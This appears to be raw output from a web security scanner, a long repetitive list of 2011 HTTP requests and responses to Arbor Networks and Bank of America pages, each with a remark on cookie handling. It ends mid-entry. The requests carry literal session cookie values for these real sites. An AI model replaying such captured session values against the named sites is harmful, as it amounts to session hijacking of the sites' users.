Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-security-visibility-products-235.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-solutions-we-provide.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/partnership-inquiry-form.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/services-network-support-maintenance-training-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/solution-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/solutions-for-places-in-your-network.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/solutions-for-your-business-needs.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/technology-partners-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /es/5.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /es/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fr/4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fr/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.php?lang=en HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /it HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /it/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jp/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jp/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /kr/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /kr/network-infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy_policy.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/lost-password-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/partner-portal-home.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /register.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adtrack/index.cgi?adlink=000309029q890000g161 HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:30 GMT Content-length: 0 P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-cookie: TRACKING_CODE=000309029q890000g161; path=/; expires=Monday, 01-Aug-2011 23:59:59 GMT Set-cookie: PROMO=000309029q890000g161; path=/; Location: https://www.bankofamerica.com/ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161 Connection: close Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:06:00 GMT Content-type: magnus-internal/cold-fusion Location: http://careers.bankofamerica.com Connection: close Set-Cookie: BIGipServerngen-www.80=3871717035.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /creditcards/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 301 Moved permanently Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:50 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Location: https://www4.bankofamerica.com/credit-cards/cardoverview.action?context_id=overview_page Page-Completion-Status: Normal Set-Cookie: TRACKING_CODE=; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=3049633451.20480.0000; path=/
<!--i2a business unit tracking code--> <script LANGUAGE="JavaScript" type="text/javascript"> var ic_bu = "credit+cards"; </script>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/index.cfm?template=manage_card&RequestTimeout=120 HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:51 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CCPATH=Affiliate; path=/; domain=.bankofamerica.com; Set-Cookie: CONTEXT=; expires=Tue, 04-Jan-2011 01:05:49 GMT; path=/; Set-Cookie: TRACKING_CODE=; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=3167139499.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /deposits/checksave/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:31 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/deposits/checksave/index.cfm?template=overview&context=en_US&ch_bag=&sa_bag=&cd_bag= Connection: close Set-Cookie: BIGipServerngen-www.80=3049633451.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
